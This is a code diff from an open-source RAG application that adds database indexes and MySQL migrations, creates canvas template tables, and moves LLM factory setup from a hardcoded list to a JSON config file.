KNOWLEDGEBASE_FOLDER_NAME=".knowledgebase"

View File

@ -21,14 +21,13 @@ import operator
from functools import wraps
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer
from flask_login import UserMixin
from playhouse.migrate import MySQLMigrator, migrate
from peewee import (
BigAutoField, BigIntegerField, BooleanField, CharField,
CompositeKey, Insert, IntegerField, TextField, FloatField, DateTimeField,
BigIntegerField, BooleanField, CharField,
CompositeKey, IntegerField, TextField, FloatField, DateTimeField,
Field, Model, Metadata
)
from playhouse.pool import PooledMySQLDatabase
from api.db import SerializedType, ParserType
from api.settings import DATABASE, stat_logger, SECRET_KEY
from api.utils.log_utils import getLogger
@ -145,10 +144,10 @@ def remove_field_name_prefix(field_name):
class BaseModel(Model):
create_time = BigIntegerField(null=True)
create_date = DateTimeField(null=True)
update_time = BigIntegerField(null=True)
update_date = DateTimeField(null=True)
create_time = BigIntegerField(null=True, index=True)
create_date = DateTimeField(null=True, index=True)
update_time = BigIntegerField(null=True, index=True)
update_date = DateTimeField(null=True, index=True)
def to_json(self):
# This function is obsolete
@ -235,7 +234,7 @@ class BaseModel(Model):
def insert(cls, __data=None, **insert):
if isinstance(__data, dict) and __data:
__data[cls._meta.combined["create_time"]
] = utils.current_timestamp()
] = utils.current_timestamp()
if insert:
insert["create_time"] = utils.current_timestamp()
@ -249,7 +248,7 @@ class BaseModel(Model):
return {}
normalized[cls._meta.combined["update_time"]
] = utils.current_timestamp()
] = utils.current_timestamp()
for f_n in AUTO_DATE_TIMESTAMP_FIELD_PREFIX:
if {f"{f_n}_time", f"{f_n}_date"}.issubset(cls._meta.combined.keys()) and \
@ -333,7 +332,7 @@ DB.lock = DatabaseLock
def close_connection():
try:
if DB:
DB.close()
DB.close_stale(age=30)
except Exception as e:
LOGGER.exception(e)
@ -344,7 +343,7 @@ class DataBaseModel(BaseModel):
@DB.connection_context()
def init_database_tables():
def init_database_tables(alter_fields=[]):
members = inspect.getmembers(sys.modules[__name__], inspect.isclass)
table_objs = []
create_failed_list = []
@ -361,6 +360,7 @@ def init_database_tables():
if create_failed_list:
LOGGER.info(f"create tables failed: {create_failed_list}")
raise Exception(f"create tables failed: {create_failed_list}")
migrate_db()
def fill_db_model_object(model_object, human_model_dict):
@ -373,9 +373,9 @@ def fill_db_model_object(model_object, human_model_dict):
class User(DataBaseModel, UserMixin):
id = CharField(max_length=32, primary_key=True)
access_token = CharField(max_length=255, null=True)
nickname = CharField(max_length=100, null=False, help_text="nicky name")
password = CharField(max_length=255, null=True, help_text="password")
access_token = CharField(max_length=255, null=True, index=True)
nickname = CharField(max_length=100, null=False, help_text="nicky name", index=True)
password = CharField(max_length=255, null=True, help_text="password", index=True)
email = CharField(
max_length=255,
null=False,
@ -386,28 +386,32 @@ class User(DataBaseModel, UserMixin):
max_length=32,
null=True,
help_text="English|Chinese",
default="English")
default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
index=True)
color_schema = CharField(
max_length=32,
null=True,
help_text="Bright|Dark",
default="Bright")
default="Bright",
index=True)
timezone = CharField(
max_length=64,
null=True,
help_text="Timezone",
default="UTC+8\tAsia/Shanghai")
last_login_time = DateTimeField(null=True)
is_authenticated = CharField(max_length=1, null=False, default="1")
is_active = CharField(max_length=1, null=False, default="1")
is_anonymous = CharField(max_length=1, null=False, default="0")
login_channel = CharField(null=True, help_text="from which user login")
default="UTC+8\tAsia/Shanghai",
index=True)
last_login_time = DateTimeField(null=True, index=True)
is_authenticated = CharField(max_length=1, null=False, default="1", index=True)
is_active = CharField(max_length=1, null=False, default="1", index=True)
is_anonymous = CharField(max_length=1, null=False, default="0", index=True)
login_channel = CharField(null=True, help_text="from which user login", index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
is_superuser = BooleanField(null=True, help_text="is root", default=False)
default="1",
index=True)
is_superuser = BooleanField(null=True, help_text="is root", default=False, index=True)
def __str__(self):
return self.email
@ -422,31 +426,41 @@ class User(DataBaseModel, UserMixin):
class Tenant(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
name = CharField(max_length=100, null=True, help_text="Tenant name")
public_key = CharField(max_length=255, null=True)
llm_id = CharField(max_length=128, null=False, help_text="default llm ID")
name = CharField(max_length=100, null=True, help_text="Tenant name", index=True)
public_key = CharField(max_length=255, null=True, index=True)
llm_id = CharField(max_length=128, null=False, help_text="default llm ID", index=True)
embd_id = CharField(
max_length=128,
null=False,
help_text="default embedding model ID")
help_text="default embedding model ID",
index=True)
asr_id = CharField(
max_length=128,
null=False,
help_text="default ASR model ID")
help_text="default ASR model ID",
index=True)
img2txt_id = CharField(
max_length=128,
null=False,
help_text="default image to text model ID")
help_text="default image to text model ID",
index=True)
rerank_id = CharField(
max_length=128,
null=False,
help_text="default rerank model ID",
index=True)
parser_ids = CharField(
max_length=256,
null=False,
help_text="document processors")
credit = IntegerField(default=512)
help_text="document processors",
index=True)
credit = IntegerField(default=512, index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "tenant"
@ -454,15 +468,16 @@ class Tenant(DataBaseModel):
class UserTenant(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
user_id = CharField(max_length=32, null=False)
tenant_id = CharField(max_length=32, null=False)
role = CharField(max_length=32, null=False, help_text="UserTenantRole")
invited_by = CharField(max_length=32, null=False)
user_id = CharField(max_length=32, null=False, index=True)
tenant_id = CharField(max_length=32, null=False, index=True)
role = CharField(max_length=32, null=False, help_text="UserTenantRole", index=True)
invited_by = CharField(max_length=32, null=False, index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "user_tenant"
@ -470,15 +485,16 @@ class UserTenant(DataBaseModel):
class InvitationCode(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
code = CharField(max_length=32, null=False)
visit_time = DateTimeField(null=True)
user_id = CharField(max_length=32, null=True)
tenant_id = CharField(max_length=32, null=True)
code = CharField(max_length=32, null=False, index=True)
visit_time = DateTimeField(null=True, index=True)
user_id = CharField(max_length=32, null=True, index=True)
tenant_id = CharField(max_length=32, null=True, index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "invitation_code"
@ -494,12 +510,14 @@ class LLMFactories(DataBaseModel):
tags = CharField(
max_length=255,
null=False,
help_text="LLM, Text Embedding, Image2Text, ASR")
help_text="LLM, Text Embedding, Image2Text, ASR",
index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
def __str__(self):
return self.name
@ -519,18 +537,22 @@ class LLM(DataBaseModel):
model_type = CharField(
max_length=128,
null=False,
help_text="LLM, Text Embedding, Image2Text, ASR")
fid = CharField(max_length=128, null=False, help_text="LLM factory id")
help_text="LLM, Text Embedding, Image2Text, ASR",
index=True)
fid = CharField(max_length=128, null=False, help_text="LLM factory id", index=True)
max_tokens = IntegerField(default=0)
tags = CharField(
max_length=255,
null=False,
help_text="LLM, Text Embedding, Image2Text, Chat, 32k...")
help_text="LLM, Text Embedding, Image2Text, Chat, 32k...",
index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
def __str__(self):
return self.llm_name
@ -540,23 +562,27 @@ class LLM(DataBaseModel):
class TenantLLM(DataBaseModel):
tenant_id = CharField(max_length=32, null=False)
tenant_id = CharField(max_length=32, null=False, index=True)
llm_factory = CharField(
max_length=128,
null=False,
help_text="LLM factory name")
help_text="LLM factory name",
index=True)
model_type = CharField(
max_length=128,
null=True,
help_text="LLM, Text Embedding, Image2Text, ASR")
help_text="LLM, Text Embedding, Image2Text, ASR",
index=True)
llm_name = CharField(
max_length=128,
null=True,
help_text="LLM name",
default="")
api_key = CharField(max_length=255, null=True, help_text="API KEY")
default="",
index=True)
api_key = CharField(max_length=1024, null=True, help_text="API KEY", index=True)
api_base = CharField(max_length=255, null=True, help_text="API Base")
used_tokens = IntegerField(default=0)
used_tokens = IntegerField(default=0, index=True)
def __str__(self):
return self.llm_name
@ -569,7 +595,7 @@ class TenantLLM(DataBaseModel):
class Knowledgebase(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
avatar = TextField(null=True, help_text="avatar base64 string")
tenant_id = CharField(max_length=32, null=False)
tenant_id = CharField(max_length=32, null=False, index=True)
name = CharField(
max_length=128,
null=False,
@ -578,36 +604,41 @@ class Knowledgebase(DataBaseModel):
language = CharField(
max_length=32,
null=True,
default="English",
help_text="English|Chinese")
default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
help_text="English|Chinese",
index=True)
description = TextField(null=True, help_text="KB description")
embd_id = CharField(
max_length=128,
null=False,
help_text="default embedding model ID")
help_text="default embedding model ID",
index=True)
permission = CharField(
max_length=16,
null=False,
help_text="me|team",
default="me")
created_by = CharField(max_length=32, null=False)
doc_num = IntegerField(default=0)
token_num = IntegerField(default=0)
chunk_num = IntegerField(default=0)
similarity_threshold = FloatField(default=0.2)
vector_similarity_weight = FloatField(default=0.3)
default="me",
index=True)
created_by = CharField(max_length=32, null=False, index=True)
doc_num = IntegerField(default=0, index=True)
token_num = IntegerField(default=0, index=True)
chunk_num = IntegerField(default=0, index=True)
similarity_threshold = FloatField(default=0.2, index=True)
vector_similarity_weight = FloatField(default=0.3, index=True)
parser_id = CharField(
max_length=32,
null=False,
help_text="default parser ID",
default=ParserType.NAIVE.value)
default=ParserType.NAIVE.value,
index=True)
parser_config = JSONField(null=False, default={"pages": [[1, 1000000]]})
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
def __str__(self):
return self.name
@ -623,18 +654,22 @@ class Document(DataBaseModel):
parser_id = CharField(
max_length=32,
null=False,
help_text="default parser ID")
help_text="default parser ID",
index=True)
parser_config = JSONField(null=False, default={"pages": [[1, 1000000]]})
source_type = CharField(
max_length=128,
null=False,
default="local",
help_text="where dose this document come from")
type = CharField(max_length=32, null=False, help_text="file extension")
help_text="where dose this document come from",
index=True)
type = CharField(max_length=32, null=False, help_text="file extension",
index=True)
created_by = CharField(
max_length=32,
null=False,
help_text="who created it")
help_text="who created it",
index=True)
name = CharField(
max_length=255,
null=True,
@ -643,27 +678,31 @@ class Document(DataBaseModel):
location = CharField(
max_length=255,
null=True,
help_text="where dose it store")
size = IntegerField(default=0)
token_num = IntegerField(default=0)
chunk_num = IntegerField(default=0)
progress = FloatField(default=0)
help_text="where dose it store",
index=True)
size = IntegerField(default=0, index=True)
token_num = IntegerField(default=0, index=True)
chunk_num = IntegerField(default=0, index=True)
progress = FloatField(default=0, index=True)
progress_msg = TextField(
null=True,
help_text="process message",
default="")
process_begin_at = DateTimeField(null=True)
process_begin_at = DateTimeField(null=True, index=True)
process_duation = FloatField(default=0)
run = CharField(
max_length=1,
null=True,
help_text="start to run processing or cancel.(1: run it; 2: cancel)",
default="0")
default="0",
index=True)
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "document"
@ -672,8 +711,7 @@ class Document(DataBaseModel):
class File(DataBaseModel):
id = CharField(
max_length=32,
primary_key=True,
)
primary_key=True)
parent_id = CharField(
max_length=32,
null=False,
@ -687,7 +725,8 @@ class File(DataBaseModel):
created_by = CharField(
max_length=32,
null=False,
help_text="who created it")
help_text="who created it",
index=True)
name = CharField(
max_length=255,
null=False,
@ -696,9 +735,15 @@ class File(DataBaseModel):
location = CharField(
max_length=255,
null=True,
help_text="where dose it store")
size = IntegerField(default=0)
type = CharField(max_length=32, null=False, help_text="file extension")
help_text="where dose it store",
index=True)
size = IntegerField(default=0, index=True)
type = CharField(max_length=32, null=False, help_text="file extension", index=True)
source_type = CharField(
max_length=128,
null=False,
default="",
help_text="where dose this document come from", index=True)
class Meta:
db_table = "file"
@ -707,8 +752,7 @@ class File(DataBaseModel):
class File2Document(DataBaseModel):
id = CharField(
max_length=32,
primary_key=True,
)
primary_key=True)
file_id = CharField(
max_length=32,
null=True,
@ -728,10 +772,13 @@ class Task(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
doc_id = CharField(max_length=32, null=False, index=True)
from_page = IntegerField(default=0)
to_page = IntegerField(default=-1)
begin_at = DateTimeField(null=True)
begin_at = DateTimeField(null=True, index=True)
process_duation = FloatField(default=0)
progress = FloatField(default=0)
progress = FloatField(default=0, index=True)
progress_msg = TextField(
null=True,
help_text="process message",
@ -740,44 +787,57 @@ class Task(DataBaseModel):
class Dialog(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
tenant_id = CharField(max_length=32, null=False)
tenant_id = CharField(max_length=32, null=False, index=True)
name = CharField(
max_length=255,
null=True,
help_text="dialog application name")
help_text="dialog application name",
index=True)
description = TextField(null=True, help_text="Dialog description")
icon = TextField(null=True, help_text="icon base64 string")
language = CharField(
max_length=32,
null=True,
default="Chinese",
help_text="English|Chinese")
default="Chinese" if "zh_CN" in os.getenv("LANG", "") else "English",
help_text="English|Chinese",
index=True)
llm_id = CharField(max_length=128, null=False, help_text="default llm ID")
llm_setting = JSONField(null=False, default={"temperature": 0.1, "top_p": 0.3, "frequency_penalty": 0.7,
"presence_penalty": 0.4, "max_tokens": 215})
"presence_penalty": 0.4, "max_tokens": 512})
prompt_type = CharField(
max_length=16,
null=False,
default="simple",
help_text="simple|advanced")
help_text="simple|advanced",
index=True)
prompt_config = JSONField(null=False, default={"system": "", "prologue": "您好我是您的助手小樱长得可爱又善良can I help you?",
"parameters": [], "empty_response": "Sorry! 知识库中未找到相关内容!"})
similarity_threshold = FloatField(default=0.2)
vector_similarity_weight = FloatField(default=0.3)
top_n = IntegerField(default=6)
top_k = IntegerField(default=1024)
do_refer = CharField(
max_length=1,
null=False,
help_text="it needs to insert reference index into answer or not",
default="1")
help_text="it needs to insert reference index into answer or not")
rerank_id = CharField(
max_length=128,
null=False,
help_text="default rerank model ID")
kb_ids = JSONField(null=False, default=[])
status = CharField(
max_length=1,
null=True,
help_text="is it validate(0: wasted1: validate)",
default="1")
default="1",
index=True)
class Meta:
db_table = "dialog"
@ -786,7 +846,7 @@ class Dialog(DataBaseModel):
class Conversation(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
dialog_id = CharField(max_length=32, null=False, index=True)
name = CharField(max_length=255, null=True, help_text="converastion name")
name = CharField(max_length=255, null=True, help_text="converastion name", index=True)
message = JSONField(null=True)
reference = JSONField(null=True, default=[])
@ -795,8 +855,8 @@ class Conversation(DataBaseModel):
class APIToken(DataBaseModel):
tenant_id = CharField(max_length=32, null=False)
token = CharField(max_length=255, null=False)
tenant_id = CharField(max_length=32, null=False, index=True)
token = CharField(max_length=255, null=False, index=True)
dialog_id = CharField(max_length=32, null=False, index=True)
class Meta:
@ -807,13 +867,85 @@ class APIToken(DataBaseModel):
class API4Conversation(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
dialog_id = CharField(max_length=32, null=False, index=True)
user_id = CharField(max_length=255, null=False, help_text="user_id")
user_id = CharField(max_length=255, null=False, help_text="user_id", index=True)
message = JSONField(null=True)
reference = JSONField(null=True, default=[])
tokens = IntegerField(default=0)
duration = FloatField(default=0)
round = IntegerField(default=0)
thumb_up = IntegerField(default=0)
duration = FloatField(default=0, index=True)
round = IntegerField(default=0, index=True)
thumb_up = IntegerField(default=0, index=True)
class Meta:
db_table = "api_4_conversation"
class UserCanvas(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
avatar = TextField(null=True, help_text="avatar base64 string")
user_id = CharField(max_length=255, null=False, help_text="user_id", index=True)
title = CharField(max_length=255, null=True, help_text="Canvas title")
description = TextField(null=True, help_text="Canvas description")
canvas_type = CharField(max_length=32, null=True, help_text="Canvas type", index=True)
dsl = JSONField(null=True, default={})
class Meta:
db_table = "user_canvas"
class CanvasTemplate(DataBaseModel):
id = CharField(max_length=32, primary_key=True)
avatar = TextField(null=True, help_text="avatar base64 string")
title = CharField(max_length=255, null=True, help_text="Canvas title")
description = TextField(null=True, help_text="Canvas description")
canvas_type = CharField(max_length=32, null=True, help_text="Canvas type", index=True)
dsl = JSONField(null=True, default={})
class Meta:
db_table = "canvas_template"
def migrate_db():
with DB.transaction():
migrator = MySQLMigrator(DB)
try:
migrate(
migrator.add_column('file', 'source_type', CharField(max_length=128, null=False, default="",
help_text="where dose this document come from",
index=True))
)
except Exception as e:
pass
try:
migrate(
migrator.add_column('tenant', 'rerank_id',
CharField(max_length=128, null=False, default="BAAI/bge-reranker-v2-m3",
help_text="default rerank model ID"))
)
except Exception as e:
pass
try:
migrate(
migrator.add_column('dialog', 'rerank_id', CharField(max_length=128, null=False, default="",
help_text="default rerank model ID"))
)
except Exception as e:
pass
try:
migrate(
migrator.add_column('dialog', 'top_k', IntegerField(default=1024))
)
except Exception as e:
pass
try:
migrate(
migrator.alter_column_type('tenant_llm', 'api_key',
CharField(max_length=1024, null=True, help_text="API KEY", index=True))
)
except Exception as e:
pass

View File

@ -13,16 +13,22 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
import time
import uuid
from copy import deepcopy
from api.db import LLMType, UserTenantRole
from api.db.db_models import init_database_tables as init_web_db, LLMFactories, LLM, TenantLLM
from api.db.services import UserService
from api.db.services.canvas_service import CanvasTemplateService
from api.db.services.document_service import DocumentService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMFactoriesService, LLMService, TenantLLMService, LLMBundle
from api.db.services.user_service import TenantService, UserTenantService
from api.settings import CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, LLM_FACTORY, API_KEY, LLM_BASE_URL
from api.utils.file_utils import get_project_base_directory
def init_superuser():
@ -83,285 +89,30 @@ def init_superuser():
tenant["embd_id"]))
factory_infos = [{
"name": "OpenAI",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
}, {
"name": "Tongyi-Qianwen",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
}, {
"name": "ZHIPU-AI",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
},
{
"name": "Ollama",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
}, {
"name": "Moonshot",
"logo": "",
"tags": "LLM,TEXT EMBEDDING",
"status": "1",
}, {
"name": "FastEmbed",
"logo": "",
"tags": "TEXT EMBEDDING",
"status": "1",
}, {
"name": "Xinference",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
},{
"name": "Youdao",
"logo": "",
"tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
"status": "1",
},{
"name": "DeepSeek",
"logo": "",
"tags": "LLM",
"status": "1",
},
# {
# "name": "文心一言",
# "logo": "",
# "tags": "LLM,TEXT EMBEDDING,SPEECH2TEXT,MODERATION",
# "status": "1",
# },
]
def init_llm_factory():
llm_infos = [
# ---------------------- OpenAI ------------------------
{
"fid": factory_infos[0]["name"],
"llm_name": "gpt-3.5-turbo",
"tags": "LLM,CHAT,4K",
"max_tokens": 4096,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "gpt-3.5-turbo-16k-0613",
"tags": "LLM,CHAT,16k",
"max_tokens": 16385,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "text-embedding-ada-002",
"tags": "TEXT EMBEDDING,8K",
"max_tokens": 8191,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "whisper-1",
"tags": "SPEECH2TEXT",
"max_tokens": 25 * 1024 * 1024,
"model_type": LLMType.SPEECH2TEXT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "gpt-4",
"tags": "LLM,CHAT,8K",
"max_tokens": 8191,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "gpt-4-turbo",
"tags": "LLM,CHAT,8K",
"max_tokens": 8191,
"model_type": LLMType.CHAT.value
},{
"fid": factory_infos[0]["name"],
"llm_name": "gpt-4-32k",
"tags": "LLM,CHAT,32K",
"max_tokens": 32768,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[0]["name"],
"llm_name": "gpt-4-vision-preview",
"tags": "LLM,CHAT,IMAGE2TEXT",
"max_tokens": 765,
"model_type": LLMType.IMAGE2TEXT.value
},
# ----------------------- Qwen -----------------------
{
"fid": factory_infos[1]["name"],
"llm_name": "qwen-turbo",
"tags": "LLM,CHAT,8K",
"max_tokens": 8191,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "qwen-plus",
"tags": "LLM,CHAT,32K",
"max_tokens": 32768,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "qwen-max-1201",
"tags": "LLM,CHAT,6K",
"max_tokens": 5899,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "text-embedding-v2",
"tags": "TEXT EMBEDDING,2K",
"max_tokens": 2048,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "paraformer-realtime-8k-v1",
"tags": "SPEECH2TEXT",
"max_tokens": 25 * 1024 * 1024,
"model_type": LLMType.SPEECH2TEXT.value
}, {
"fid": factory_infos[1]["name"],
"llm_name": "qwen-vl-max",
"tags": "LLM,CHAT,IMAGE2TEXT",
"max_tokens": 765,
"model_type": LLMType.IMAGE2TEXT.value
},
# ---------------------- ZhipuAI ----------------------
{
"fid": factory_infos[2]["name"],
"llm_name": "glm-3-turbo",
"tags": "LLM,CHAT,",
"max_tokens": 128 * 1000,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[2]["name"],
"llm_name": "glm-4",
"tags": "LLM,CHAT,",
"max_tokens": 128 * 1000,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[2]["name"],
"llm_name": "glm-4v",
"tags": "LLM,CHAT,IMAGE2TEXT",
"max_tokens": 2000,
"model_type": LLMType.IMAGE2TEXT.value
},
{
"fid": factory_infos[2]["name"],
"llm_name": "embedding-2",
"tags": "TEXT EMBEDDING",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
},
# ------------------------ Moonshot -----------------------
{
"fid": factory_infos[4]["name"],
"llm_name": "moonshot-v1-8k",
"tags": "LLM,CHAT,",
"max_tokens": 7900,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[4]["name"],
"llm_name": "moonshot-v1-32k",
"tags": "LLM,CHAT,",
"max_tokens": 32768,
"model_type": LLMType.CHAT.value
}, {
"fid": factory_infos[4]["name"],
"llm_name": "moonshot-v1-128k",
"tags": "LLM,CHAT",
"max_tokens": 128 * 1000,
"model_type": LLMType.CHAT.value
},
# ------------------------ FastEmbed -----------------------
{
"fid": factory_infos[5]["name"],
"llm_name": "BAAI/bge-small-en-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "BAAI/bge-small-zh-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
}, {
"fid": factory_infos[5]["name"],
"llm_name": "BAAI/bge-base-en-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
}, {
"fid": factory_infos[5]["name"],
"llm_name": "BAAI/bge-large-en-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "sentence-transformers/all-MiniLM-L6-v2",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "nomic-ai/nomic-embed-text-v1.5",
"tags": "TEXT EMBEDDING,",
"max_tokens": 8192,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "jinaai/jina-embeddings-v2-small-en",
"tags": "TEXT EMBEDDING,",
"max_tokens": 2147483648,
"model_type": LLMType.EMBEDDING.value
}, {
"fid": factory_infos[5]["name"],
"llm_name": "jinaai/jina-embeddings-v2-base-en",
"tags": "TEXT EMBEDDING,",
"max_tokens": 2147483648,
"model_type": LLMType.EMBEDDING.value
},
# ------------------------ Youdao -----------------------
{
"fid": factory_infos[7]["name"],
"llm_name": "maidalun1020/bce-embedding-base_v1",
"tags": "TEXT EMBEDDING,",
"max_tokens": 512,
"model_type": LLMType.EMBEDDING.value
},
# ------------------------ DeepSeek -----------------------
{
"fid": factory_infos[8]["name"],
"llm_name": "deepseek-chat",
"tags": "LLM,CHAT,",
"max_tokens": 32768,
"model_type": LLMType.CHAT.value
},
{
"fid": factory_infos[8]["name"],
"llm_name": "deepseek-coder",
"tags": "LLM,CHAT,",
"max_tokens": 16385,
"model_type": LLMType.CHAT.value
},
]
for info in factory_infos:
try:
LLMService.filter_delete([(LLM.fid == "MiniMax" or LLM.fid == "Minimax")])
except Exception as e:
pass
factory_llm_infos = json.load(
open(
os.path.join(get_project_base_directory(), "conf", "llm_factories.json"),
"r",
)
)
for factory_llm_info in factory_llm_infos["factory_llm_infos"]:
llm_infos = factory_llm_info.pop("llm")
try:
LLMFactoriesService.save(**info)
except Exception as e:
pass
for info in llm_infos:
try:
LLMService.save(**info)
LLMFactoriesService.save(**factory_llm_info)
except Exception as e:
pass
for llm_info in llm_infos:
llm_info["fid"] = factory_llm_info["name"]
try:
LLMService.save(**llm_info)
except Exception as e:
pass
LLMFactoriesService.filter_delete([LLMFactories.name == "Local"])
LLMService.filter_delete([LLM.fid == "Local"])
@ -370,16 +121,51 @@ def init_llm_factory():
LLMFactoriesService.filter_delete([LLMFactoriesService.model.name == "QAnything"])
LLMService.filter_delete([LLMService.model.fid == "QAnything"])
TenantLLMService.filter_update([TenantLLMService.model.llm_factory == "QAnything"], {"llm_factory": "Youdao"})
TenantService.filter_update([1 == 1], {
"parser_ids": "naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph"})
## insert openai two embedding models to the current openai user.
print("Start to insert 2 OpenAI embedding models...")
tenant_ids = set([row["tenant_id"] for row in TenantLLMService.get_openai_models()])
for tid in tenant_ids:
for row in TenantLLMService.query(llm_factory="OpenAI", tenant_id=tid):
row = row.to_dict()
row["model_type"] = LLMType.EMBEDDING.value
row["llm_name"] = "text-embedding-3-small"
row["used_tokens"] = 0
try:
TenantLLMService.save(**row)
row = deepcopy(row)
row["llm_name"] = "text-embedding-3-large"
TenantLLMService.save(**row)
except Exception as e:
pass
break
for kb_id in KnowledgebaseService.get_all_ids():
KnowledgebaseService.update_by_id(kb_id, {"doc_num": DocumentService.get_kb_doc_count(kb_id)})
"""
drop table llm;
drop table llm_factories;
update tenant set parser_ids='naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One';
update tenant set parser_ids='naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph';
alter table knowledgebase modify avatar longtext;
alter table user modify avatar longtext;
alter table dialog modify icon longtext;
"""
def add_graph_templates():
dir = os.path.join(get_project_base_directory(), "agent", "templates")
for fnm in os.listdir(dir):
try:
cnvs = json.load(open(os.path.join(dir, fnm), "r"))
try:
CanvasTemplateService.save(**cnvs)
except:
CanvasTemplateService.update_by_id(cnvs["id"], cnvs)
except Exception as e:
print("Add graph templates error: ", e)
print("------------", flush=True)
def init_web_data():
start_time = time.time()
@ -387,6 +173,7 @@ def init_web_data():
if not UserService.get_all().count():
init_superuser()
add_graph_templates()
print("init web data success:{}".format(time.time() - start_time))

View File

@ -0,0 +1,26 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import datetime
import peewee
from api.db.db_models import DB, API4Conversation, APIToken, Dialog, CanvasTemplate, UserCanvas
from api.db.services.common_service import CommonService
class CanvasTemplateService(CommonService):
model = CanvasTemplate
class UserCanvasService(CommonService):
model = UserCanvas

View File

@ -13,17 +13,22 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import re
from copy import deepcopy
from api.db import LLMType
from api.db import LLMType, ParserType
from api.db.db_models import Dialog, Conversation
from api.db.services.common_service import CommonService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
from api.settings import chat_logger, retrievaler
from api.settings import chat_logger, retrievaler, kg_retrievaler
from rag.app.resume import forbidden_select_fields4resume
from rag.nlp import keyword_extraction
from rag.nlp.search import index_name
from rag.utils import rmSpace, num_tokens_from_string, encoder
from api.utils.file_utils import get_project_base_directory
class DialogService(CommonService):
